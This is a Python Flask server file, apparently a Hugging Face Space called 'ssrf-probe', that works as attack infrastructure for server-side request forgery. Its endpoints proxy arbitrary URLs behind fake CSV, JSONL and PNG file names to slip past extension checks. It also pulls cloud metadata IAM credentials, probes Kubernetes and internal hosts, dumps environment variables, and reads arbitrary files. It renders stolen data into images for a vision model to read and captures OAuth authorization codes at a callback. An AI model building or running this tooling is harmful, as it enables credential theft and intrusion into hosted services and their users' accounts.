ssrf-probe / app.py
FIRSTACCOUNT69's picture
Add CIMD and callback endpoints
b1754d2 verified
from flask import Flask, request, jsonify, redirect, Response, make_response
import requests, os, socket, json, time
app = Flask(__name__)
LOG = []
@app.route('/')
def index():
return 'OK'
@app.route('/log', methods=['GET', 'POST', 'PUT', 'DELETE', 'PATCH'])
def log_request():
entry = {
'time': time.time(),
'method': request.method,
'path': request.full_path,
'headers': dict(request.headers),
'body': request.get_data(as_text=True)[:2000],
'remote_addr': request.remote_addr
}
LOG.append(entry)
return 'logged'
@app.route('/logs')
def show_logs():
return jsonify(LOG[-200:])
@app.route('/clear-logs')
def clear_logs():
LOG.clear()
return 'cleared'
@app.route('/fetch')
def fetch():
url = request.args.get('url', '')
headers = {}
for h in request.args.get('headers', '').split(','):
if ':' in h:
k, v = h.split(':', 1)
headers[k] = v.replace('+', ' ')
try:
r = requests.get(url, headers=headers, timeout=5, verify=False)
return r.text, r.status_code, {'Content-Type': 'text/plain'}
except Exception as e:
return str(e), 500
@app.route('/redir')
def redir():
target = request.args.get('url', '/')
code = int(request.args.get('code', '302'))
entry = {
'time': time.time(),
'method': request.method,
'path': request.full_path,
'headers': dict(request.headers),
'remote_addr': request.remote_addr
}
LOG.append(entry)
return redirect(target, code=code)
# Redirect endpoint that looks like a CSV file
@app.route('/redir-data.csv')
def redir_csv():
target = request.args.get('t', '/')
code = int(request.args.get('code', '302'))
entry = {
'time': time.time(),
'method': request.method,
'path': request.full_path,
'headers': dict(request.headers),
'remote_addr': request.remote_addr
}
LOG.append(entry)
return redirect(target, code=code)
# Redirect that looks like a JSONL file
@app.route('/redir-data.jsonl')
def redir_jsonl():
target = request.args.get('t', '/')
code = int(request.args.get('code', '302'))
entry = {
'time': time.time(),
'method': request.method,
'path': request.full_path,
'headers': dict(request.headers),
'remote_addr': request.remote_addr
}
LOG.append(entry)
return redirect(target, code=code)
# Redirect that looks like a parquet file
@app.route('/redir-data.parquet')
def redir_parquet():
target = request.args.get('t', '/')
code = int(request.args.get('code', '302'))
entry = {
'time': time.time(),
'method': request.method,
'path': request.full_path,
'headers': dict(request.headers),
'remote_addr': request.remote_addr
}
LOG.append(entry)
return redirect(target, code=code)
# Smart proxy CSV: fetches any URL and returns result as CSV
@app.route('/proxy-csv.csv')
def proxy_csv():
target = request.args.get('t', '')
entry = {
'time': time.time(),
'method': request.method,
'path': request.full_path,
'headers': dict(request.headers),
'remote_addr': request.remote_addr
}
LOG.append(entry)
if not target:
return 'text\nno target specified\n', 200, {'Content-Type': 'text/csv'}
try:
r = requests.get(target, timeout=10, verify=False)
lines = r.text.split('\n')[:100]
csv_data = 'text\n' + '\n'.join(f'"{line}"' for line in lines if line.strip()) + '\n'
return csv_data, 200, {'Content-Type': 'text/csv'}
except Exception as e:
return f'text\nerror: {str(e)}\n', 200, {'Content-Type': 'text/csv'}
# Smart proxy JSONL
@app.route('/proxy-jsonl.jsonl')
def proxy_jsonl():
target = request.args.get('t', '')
entry = {
'time': time.time(),
'method': request.method,
'path': request.full_path,
'headers': dict(request.headers),
'remote_addr': request.remote_addr
}
LOG.append(entry)
if not target:
return '{"text": "no target"}\n', 200, {'Content-Type': 'application/jsonl'}
try:
r = requests.get(target, timeout=10, verify=False)
lines = r.text.split('\n')[:100]
jsonl_data = '\n'.join(json.dumps({"text": line}) for line in lines if line.strip()) + '\n'
return jsonl_data, 200, {'Content-Type': 'application/jsonl'}
except Exception as e:
return json.dumps({"text": f"error: {str(e)}"}) + '\n', 200, {'Content-Type': 'application/jsonl'}
# Path-based proxy CSV: target URL is in the path, filename is data.csv
# URL format: /p/<base64_encoded_target>/data.csv
# This way the basename is always data.csv (passes extension check)
import base64
@app.route('/p/<target_b64>/data.csv')
def path_proxy_csv(target_b64):
entry = {
'time': time.time(),
'method': request.method,
'path': request.full_path,
'headers': dict(request.headers),
'remote_addr': request.remote_addr
}
LOG.append(entry)
try:
target = base64.urlsafe_b64decode(target_b64 + '==').decode()
except Exception:
return 'text\nerror: invalid target encoding\n', 200, {'Content-Type': 'text/csv'}
if request.method == 'HEAD':
resp = make_response('', 200)
resp.headers['Content-Type'] = 'text/csv'
resp.headers['Content-Length'] = '100'
return resp
try:
r = requests.get(target, timeout=10, verify=False)
lines = r.text.split('\n')[:100]
csv_data = 'text\n' + '\n'.join(f'"{line}"' for line in lines if line.strip()) + '\n'
return csv_data, 200, {'Content-Type': 'text/csv'}
except Exception as e:
return f'text\nerror: {str(e)}\n', 200, {'Content-Type': 'text/csv'}
# Path-based proxy JSONL
@app.route('/p/<target_b64>/data.jsonl')
def path_proxy_jsonl(target_b64):
entry = {
'time': time.time(),
'method': request.method,
'path': request.full_path,
'headers': dict(request.headers),
'remote_addr': request.remote_addr
}
LOG.append(entry)
try:
target = base64.urlsafe_b64decode(target_b64 + '==').decode()
except Exception:
return '{"text": "error: invalid target encoding"}\n', 200, {'Content-Type': 'application/jsonl'}
if request.method == 'HEAD':
resp = make_response('', 200)
resp.headers['Content-Type'] = 'application/jsonl'
resp.headers['Content-Length'] = '100'
return resp
try:
r = requests.get(target, timeout=10, verify=False)
lines = r.text.split('\n')[:100]
jsonl_data = '\n'.join(json.dumps({"text": line}) for line in lines if line.strip()) + '\n'
return jsonl_data, 200, {'Content-Type': 'application/jsonl'}
except Exception as e:
return json.dumps({"text": f"error: {str(e)}"}) + '\n', 200, {'Content-Type': 'application/jsonl'}
@app.route('/data.csv')
def serve_csv():
entry = {
'time': time.time(),
'method': request.method,
'path': request.full_path,
'headers': dict(request.headers),
'body': request.get_data(as_text=True)[:2000],
'remote_addr': request.remote_addr
}
LOG.append(entry)
return 'text\nhello world\nssrf confirmed\n', 200, {'Content-Type': 'text/csv'}
@app.route('/data.jsonl')
def serve_jsonl():
entry = {
'time': time.time(),
'method': request.method,
'path': request.full_path,
'headers': dict(request.headers),
'body': request.get_data(as_text=True)[:2000],
'remote_addr': request.remote_addr
}
LOG.append(entry)
return '{"text": "hello world"}\n{"text": "ssrf confirmed"}\n', 200, {'Content-Type': 'application/jsonl'}
@app.route('/env')
def env():
return jsonify(dict(os.environ))
@app.route('/scan')
def scan():
host = request.args.get('host', '')
ports = request.args.get('ports', '80,443').split(',')
timeout = float(request.args.get('timeout', '1'))
results = {}
for p in ports:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
r = s.connect_ex((host, int(p)))
results[p] = 'open' if r == 0 else 'closed'
s.close()
except Exception as e:
results[p] = str(e)
return jsonify(results)
@app.route('/resolve')
def resolve():
host = request.args.get('host', '')
try:
return jsonify({'ip': socket.gethostbyname(host), 'host': host})
except Exception as e:
return jsonify({'error': str(e)})
@app.route('/readfile')
def readfile():
path = request.args.get('path', '')
try:
with open(path, 'r') as f:
return f.read()[:10000], 200, {'Content-Type': 'text/plain'}
except Exception as e:
return str(e), 500
@app.route('/listdir')
def listdir():
path = request.args.get('path', '/')
try:
entries = os.listdir(path)
return jsonify(entries)
except Exception as e:
return jsonify({'error': str(e)})
@app.route('/post')
def do_post():
url = request.args.get('url', '')
body = request.args.get('body', '')
ct = request.args.get('ct', 'application/json')
headers = {'Content-Type': ct}
for h in request.args.get('headers', '').split(','):
if ':' in h:
k, v = h.split(':', 1)
headers[k] = v.replace('+', ' ')
try:
r = requests.post(url, data=body, headers=headers, timeout=10, verify=False)
return r.text, r.status_code, {'Content-Type': 'text/plain'}
except Exception as e:
return str(e), 500
@app.route('/selfenv.csv')
def selfenv_csv():
entry = {'time': time.time(), 'method': request.method, 'path': request.full_path,
'headers': dict(request.headers), 'remote_addr': request.remote_addr}
LOG.append(entry)
try:
r = requests.get('http://localhost:7860/env', timeout=5)
data = r.json()
csv_lines = ['key,value']
for k, v in data.items():
csv_lines.append(f'"{k}","{str(v)[:200]}"')
return '\n'.join(csv_lines) + '\n', 200, {'Content-Type': 'text/csv'}
except Exception as e:
return f'key,value\nerror,"{str(e)}"\n', 200, {'Content-Type': 'text/csv'}
@app.route('/k8sapi.csv')
def k8s_csv():
entry = {'time': time.time(), 'method': request.method, 'path': request.full_path,
'headers': dict(request.headers), 'remote_addr': request.remote_addr}
LOG.append(entry)
targets = [
'https://172.20.0.1:443/api',
'https://kubernetes.default.svc:443/api',
'http://172.20.0.1:80/api',
]
results = []
for t in targets:
try:
r = requests.get(t, timeout=3, verify=False)
results.append(f'"{t}","{r.status_code}","{r.text[:200]}"')
except Exception as e:
results.append(f'"{t}","error","{str(e)[:100]}"')
return 'target,status,response\n' + '\n'.join(results) + '\n', 200, {'Content-Type': 'text/csv'}
@app.route('/metadata.csv')
def metadata_csv():
entry = {'time': time.time(), 'method': request.method, 'path': request.full_path,
'headers': dict(request.headers), 'remote_addr': request.remote_addr}
LOG.append(entry)
targets = [
('http://169.254.169.254/latest/meta-data/', {}),
('http://169.254.169.254/latest/meta-data/iam/security-credentials/', {}),
('http://metadata.google.internal/computeMetadata/v1/', {'Metadata-Flavor': 'Google'}),
('http://100.100.100.200/latest/meta-data/', {}),
]
results = []
for url, hdrs in targets:
try:
r = requests.get(url, headers=hdrs, timeout=3, verify=False)
results.append(f'"{url}","{r.status_code}","{r.text[:200]}"')
except Exception as e:
results.append(f'"{url}","error","{str(e)[:100]}"')
return 'target,status,response\n' + '\n'.join(results) + '\n', 200, {'Content-Type': 'text/csv'}
@app.route('/internalprobe.csv')
def internalprobe_csv():
entry = {'time': time.time(), 'method': request.method, 'path': request.full_path,
'headers': dict(request.headers), 'remote_addr': request.remote_addr}
LOG.append(entry)
targets = [
'http://10.16.4.123:80/',
'http://10.16.34.155:80/',
'http://10.20.1.9:80/',
'http://10.20.31.87:80/',
]
results = []
for t in targets:
try:
r = requests.get(t, timeout=3, verify=False)
results.append(f'"{t}","{r.status_code}","{r.text[:200]}"')
except Exception as e:
results.append(f'"{t}","error","{str(e)[:100]}"')
return 'target,status,response\n' + '\n'.join(results) + '\n', 200, {'Content-Type': 'text/csv'}
@app.route('/selfenv.jsonl')
def selfenv_jsonl():
entry = {'time': time.time(), 'method': request.method, 'path': request.full_path,
'headers': dict(request.headers), 'remote_addr': request.remote_addr}
LOG.append(entry)
try:
r = requests.get('http://localhost:7860/env', timeout=5)
data = r.json()
lines = [json.dumps({"text": f"{k}={str(v)[:200]}"}) for k, v in data.items()]
return '\n'.join(lines) + '\n', 200, {'Content-Type': 'application/jsonl'}
except Exception as e:
return json.dumps({"text": f"error: {str(e)}"}) + '\n', 200, {'Content-Type': 'application/jsonl'}
# Image proxy - fetches URL, renders response text into a PNG image
# The vision model will read the text from the image
from PIL import Image, ImageDraw, ImageFont
import io
@app.route('/img-proxy.png')
def img_proxy():
"""Fetch a URL and render its response as text in an image"""
target = request.args.get('url', '')
entry = {'time': time.time(), 'method': request.method, 'path': request.full_path,
'headers': dict(request.headers), 'remote_addr': request.remote_addr}
LOG.append(entry)
if not target:
text = "No URL specified"
else:
try:
hdrs = {}
if 'metadata.google' in target:
hdrs['Metadata-Flavor'] = 'Google'
r = requests.get(target, headers=hdrs, timeout=5, verify=False)
text = f"URL: {target}\nStatus: {r.status_code}\nHeaders: {dict(r.headers)}\n\nBody:\n{r.text[:3000]}"
except Exception as e:
text = f"URL: {target}\nError: {str(e)}"
# Render text into image
lines = text.split('\n')
img_width = 800
line_height = 16
img_height = max(200, (len(lines) + 2) * line_height)
img = Image.new('RGB', (img_width, img_height), color='white')
draw = ImageDraw.Draw(img)
y = 10
for line in lines:
draw.text((10, y), line[:100], fill='black')
y += line_height
buf = io.BytesIO()
img.save(buf, format='PNG')
buf.seek(0)
return buf.getvalue(), 200, {'Content-Type': 'image/png'}
@app.route('/img-env.png')
def img_env():
"""Render Space environment variables as text in an image"""
entry = {'time': time.time(), 'method': request.method, 'path': request.full_path,
'headers': dict(request.headers), 'remote_addr': request.remote_addr}
LOG.append(entry)
text = "Space Environment:\n"
for k, v in sorted(os.environ.items()):
text += f"{k}={str(v)[:100]}\n"
lines = text.split('\n')
img_width = 800
line_height = 16
img_height = max(200, (len(lines) + 2) * line_height)
img = Image.new('RGB', (img_width, img_height), color='white')
draw = ImageDraw.Draw(img)
y = 10
for line in lines:
draw.text((10, y), line[:100], fill='black')
y += line_height
buf = io.BytesIO()
img.save(buf, format='PNG')
buf.seek(0)
return buf.getvalue(), 200, {'Content-Type': 'image/png'}
@app.route('/img-internal.png')
def img_internal():
"""Fetch internal endpoints and render results as image"""
entry = {'time': time.time(), 'method': request.method, 'path': request.full_path,
'headers': dict(request.headers), 'remote_addr': request.remote_addr}
LOG.append(entry)
text = "Internal Network Probe:\n\n"
targets = [
'http://169.254.169.254/latest/meta-data/',
'http://169.254.169.254/latest/meta-data/iam/security-credentials/',
'http://10.0.249.125/',
'http://10.0.249.125/api/whoami-v2',
]
for t in targets:
try:
r = requests.get(t, timeout=3, verify=False)
text += f"[{t}] {r.status_code}: {r.text[:200]}\n"
except Exception as e:
text += f"[{t}] Error: {str(e)[:100]}\n"
lines = text.split('\n')
img_width = 800
line_height = 16
img_height = max(200, (len(lines) + 2) * line_height)
img = Image.new('RGB', (img_width, img_height), color='white')
draw = ImageDraw.Draw(img)
y = 10
for line in lines:
draw.text((10, y), line[:100], fill='black')
y += line_height
buf = io.BytesIO()
img.save(buf, format='PNG')
buf.seek(0)
return buf.getvalue(), 200, {'Content-Type': 'image/png'}
# Serve a valid small test image
@app.route('/test.png')
def test_png():
entry = {'time': time.time(), 'method': request.method, 'path': request.full_path,
'headers': dict(request.headers), 'remote_addr': request.remote_addr}
LOG.append(entry)
img = Image.new('RGB', (200, 100), color='red')
draw = ImageDraw.Draw(img)
draw.text((10, 10), "SSRF TEST IMAGE", fill='white')
draw.text((10, 30), f"Time: {time.time()}", fill='white')
buf = io.BytesIO()
img.save(buf, format='PNG')
buf.seek(0)
return buf.getvalue(), 200, {'Content-Type': 'image/png'}
@app.route("/.well-known/oauth-client")
def cimd():
"""Client ID Metadata Document endpoint for CIMD testing"""
entry = {
"time": time.time(),
"method": request.method,
"path": request.full_path,
"headers": dict(request.headers),
"remote_addr": request.remote_addr,
"note": "CIMD_FETCH"
}
LOG.append(entry)
metadata = {
"client_id": "https://firstaccount69-ssrf-probe.hf.space/.well-known/oauth-client",
"client_name": "SSRF Probe CIMD Test",
"redirect_uris": ["https://firstaccount69-ssrf-probe.hf.space/callback"],
"scope": "openid profile email read-repos write-repos manage-repos",
"grant_types": ["authorization_code", "refresh_token", "urn:ietf:params:oauth:grant-type:token-exchange"],
"response_types": ["code"],
"token_endpoint_auth_method": "none"
}
return jsonify(metadata)
@app.route("/callback")
def oauth_callback():
"""OAuth callback to capture authorization codes"""
entry = {
"time": time.time(),
"method": request.method,
"path": request.full_path,
"headers": dict(request.headers),
"args": dict(request.args),
"remote_addr": request.remote_addr,
"note": "OAUTH_CALLBACK"
}
LOG.append(entry)
return jsonify({"status": "captured", "args": dict(request.args)})
if __name__ == '__main__':
app.run(host='0.0.0.0', port=7860)